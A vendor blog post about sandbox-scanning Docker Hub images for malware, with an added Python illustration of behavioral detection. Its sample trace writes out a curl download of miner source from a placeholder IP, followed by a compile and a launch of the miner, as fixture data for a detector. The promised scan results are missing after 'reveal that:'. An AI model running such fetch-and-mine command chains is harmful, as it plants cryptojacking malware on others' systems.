Linux containers aren't new. In fact, this technology was invented 20 years ago.
In 2013, Docker entered the scene and revolutionized Linux containers by offering an easy-to-use command line interface (CLI), an engine, and a registry server. Combined, these technologies have concealed all the complexity of building and running containers behind one common industry standard. As a result, Docker's popularity has skyrocketed, rivalling virtual machines and transforming the industry.
In order to locate and share Docker container images, Docker offers a service called Docker Hub. Its main feature, repositories, allows the development community to push (upload) and pull (download) container images.
With Docker Hub, anyone in the world can download and execute any public image, as if it were a standalone application.
Today, Docker Hub hosts over 4 million public Docker container images.
With 8 billion pulls (downloads) in January 2020 and growing, its annualized image pulls should top 100 billion this year.
How many container images currently hosted at Docker Hub are malicious or potentially harmful? What sort of damage can they inflict?
What if a Docker container image downloaded and executed malware at runtime? Is there a reliable way to tell that?
What if a compromised Docker container image was downloaded by an unsuspecting customer and used as a parent image to build and then deploy a new container image into production, practically publishing an application with a backdoor built into it? Is there any way to stop that from happening?
At Prevasio, we asked ourselves these questions multiple times.
What we decided to do has never been done before.
At Prevasio, we have built a dynamic analysis sandbox that works on the same principle as a conventional sandbox that 'detonates' malware in a safe environment. The only difference is that instead of 'detonating' an executable file, such as a Windows PE file or a Linux ELF binary, Prevasio Analyzer first pulls (downloads) an image from any container registry and then 'detonates' it in its own virtual environment, outside the organization's or customer's infrastructure.
Using our solution, we then dynamically analyzed all 4 million container images hosted at Docker Hub.
In order to handle such a massive volume of images, Prevasio Analyzer was executed non-stop for a period of one month on 800 machines running in parallel.
The results of our dynamic scan reveal that:
Our analysis of malicious containers also shows that quite a few images carry a dynamic payload. That is, the image in its original form contains no malicious binary; at runtime, however, it may be scripted to download the source code of a coinminer, then compile and execute it.
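As an added illustration (not Prevasio's code or trace format), the toy model below contrasts what a static scan of an image's shipped files sees with what a runtime trace shows for the fetch, compile and execute pattern described above; the file list, the `(event, detail)` trace format and the addresses are all constructed.

```python
# Added illustration: a toy model of the "dynamic payload" case, showing why a
# static scan of image layers misses it while a behavioral trace catches it.
DOWNLOADERS = {"curl", "wget", "git"}
COMPILERS = {"gcc", "cc", "g++", "make", "cargo"}
MINER_NAMES = ("xmrig", "minerd")  # names a static signature scan might look for

# Constructed image file list: nothing suspicious is present on disk.
IMAGE_FILES = {"/bin/sh", "/entrypoint.sh", "/usr/bin/curl", "/usr/bin/tar",
               "/usr/bin/make", "/usr/bin/gcc"}

# Constructed sandbox trace in a hypothetical (event, detail) format:
# "exec" carries argv, "connect" carries the remote endpoint (documentation IPs).
TRACE = [
    ("exec", ["/bin/sh", "/entrypoint.sh"]),
    ("connect", "203.0.113.10:443"),
    ("exec", ["/usr/bin/curl", "-sL", "https://203.0.113.10/src.tgz", "-o", "/tmp/src.tgz"]),
    ("exec", ["/usr/bin/tar", "xzf", "/tmp/src.tgz", "-C", "/tmp"]),
    ("exec", ["/usr/bin/make", "-C", "/tmp/src"]),
    ("exec", ["/usr/bin/gcc", "-O2", "/tmp/src/miner.c", "-o", "/tmp/src/miner"]),
    ("exec", ["/tmp/src/miner", "--pool", "203.0.113.10:3333"]),
]
# A benign trace: it fetches something, but never compiles or runs a new binary.
BENIGN_TRACE = [
    ("exec", ["/bin/sh", "/entrypoint.sh"]),
    ("exec", ["/usr/bin/curl", "-s", "https://example.org/health"]),
]


def static_scan(image_files, bad_names=MINER_NAMES):
    """Static view: only files shipped in the image layers are visible."""
    return sorted(f for f in image_files if any(n in f.lower() for n in bad_names))


def analyze_trace(image_files, trace):
    """Behavioral view: look for a fetch -> compile -> run-new-binary chain."""
    findings = {"downloads": [], "compiles": [], "new_binaries": [], "connects": []}
    for kind, detail in trace:
        if kind == "connect":
            findings["connects"].append(detail)
            continue
        path = detail[0]
        prog = path.rsplit("/", 1)[-1]
        if prog in DOWNLOADERS:
            findings["downloads"].append(detail)
        elif prog in COMPILERS:
            findings["compiles"].append(detail)
        if path not in image_files:  # executed binary did not exist in the image
            findings["new_binaries"].append(path)
    findings["dynamic_payload"] = bool(
        findings["downloads"] and findings["compiles"] and findings["new_binaries"])
    return findings
```

Running `static_scan(IMAGE_FILES)` returns nothing, while `analyze_trace(IMAGE_FILES, TRACE)` flags the chain and names the compiled binary that never existed in the image.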
A dynamic analysis sandbox, such as Prevasio Analyzer, is the only solution that provides a behavioral analysis of Docker containers. It is built to reveal the malicious intentions of Docker containers by executing them in its own virtual environment, exposing the full scope of their behavior.
The whitepaper with our findings is available here.